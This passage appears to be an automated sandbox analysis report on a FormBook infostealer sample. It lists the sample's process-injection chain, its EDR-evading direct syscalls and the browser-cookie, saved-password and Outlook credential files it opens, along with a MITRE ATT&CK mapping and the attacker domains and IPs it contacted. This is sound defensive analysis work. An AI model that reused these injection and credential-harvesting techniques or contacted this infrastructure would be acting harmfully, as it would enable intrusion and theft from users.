                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Windows\SysWOW64\runonce.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\runonce.exeThread register set: target process: 3452Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\runonce.exeThread APC queued: target process: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: FA6008Jump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Program Files (x86)\pRGtEQGDbGjyzcqYVBGQevNGFNXXjhUBlEHDgqzLOPewBVEhnSxMAMWcKXBMZDjKuQuIAwu\zk0NoejtsplNyT.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: zk0NoejtsplNyT.exe, 00000006.00000002.2622298245.0000000001111000.00000002.00000001.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 00000006.00000000.1805960431.0000000001111000.00000002.00000001.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 0000000A.00000000.1965752200.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: zk0NoejtsplNyT.exe, 00000006.00000002.2622298245.0000000001111000.00000002.00000001.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 00000006.00000000.1805960431.0000000001111000.00000002.00000001.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 0000000A.00000000.1965752200.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: zk0NoejtsplNyT.exe, 00000006.00000002.2622298245.0000000001111000.00000002.00000001.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 00000006.00000000.1805960431.0000000001111000.00000002.00000001.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 0000000A.00000000.1965752200.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: zk0NoejtsplNyT.exe, 00000006.00000002.2622298245.0000000001111000.00000002.00000001.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 00000006.00000000.1805960431.0000000001111000.00000002.00000001.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 0000000A.00000000.1965752200.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\uI1A364y2P.exeQueries volume information: C:\Users\user\Desktop\uI1A364y2P.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\uI1A364y2P.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2622831445.0000000000E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1896210182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1898549752.0000000002F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1896911087.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2624771896.0000000004E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2622738562.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2621242417.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2622801830.0000000003C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\runonce.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2622831445.0000000000E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1896210182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1898549752.0000000002F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1896911087.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2624771896.0000000004E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2622738562.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2621242417.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2622801830.0000000003C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		612
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook612
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1618201 Sample: uI1A364y2P.exe Startdate: 18/02/2025 Architecture: WINDOWS Score: 100 35 www.seasay.xyz 2->35 37 www.l63339.xyz 2->37 39 6 other IPs or domains 2->39 47 Suricata IDS alerts for network traffic 2->47 49 Antivirus detection for URL or domain 2->49 51 Antivirus / Scanner detection for submitted sample 2->51 55 5 other signatures 2->55 10 uI1A364y2P.exe 3 2->10         started        signatures3 53 Performs DNS queries to domains with low reputation 37->53 process4 file5 33 C:\Users\user\AppData\...\uI1A364y2P.exe.log, CSV 10->33 dropped 67 Writes to foreign memory regions 10->67 69 Allocates memory in foreign processes 10->69 71 Injects a PE file into a foreign processes 10->71 14 aspnet_compiler.exe 10->14         started        17 aspnet_compiler.exe 10->17         started        19 aspnet_compiler.exe 10->19         started        signatures6 process7 signatures8 75 Maps a DLL or memory area into another process 14->75 21 zk0NoejtsplNyT.exe 14->21 injected process9 signatures10 57 Found direct / indirect Syscall (likely to bypass EDR) 21->57 24 runonce.exe 13 21->24         started        process11 signatures12 59 Tries to steal Mail credentials (via file / registry access) 24->59 61 Tries to harvest and steal browser information (history, passwords, etc) 24->61 63 Modifies the context of a thread in another process (thread injection) 24->63 65 3 other signatures 24->65 27 zk0NoejtsplNyT.exe 24->27 injected 31 firefox.exe 24->31         started        process13 dnsIp14 41 www.seasay.xyz 103.106.67.112, 61070, 61071, 61072 VOYAGERNET-AS-APVoyagerInternetLtdNZ New Zealand 27->41 43 www.lucynoel6465.shop 104.21.48.1, 61078, 61079, 61080 CLOUDFLARENETUS United States 27->43 45 3 other IPs or domains 27->45 73 Found direct / indirect Syscall (likely to bypass EDR) 27->73 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.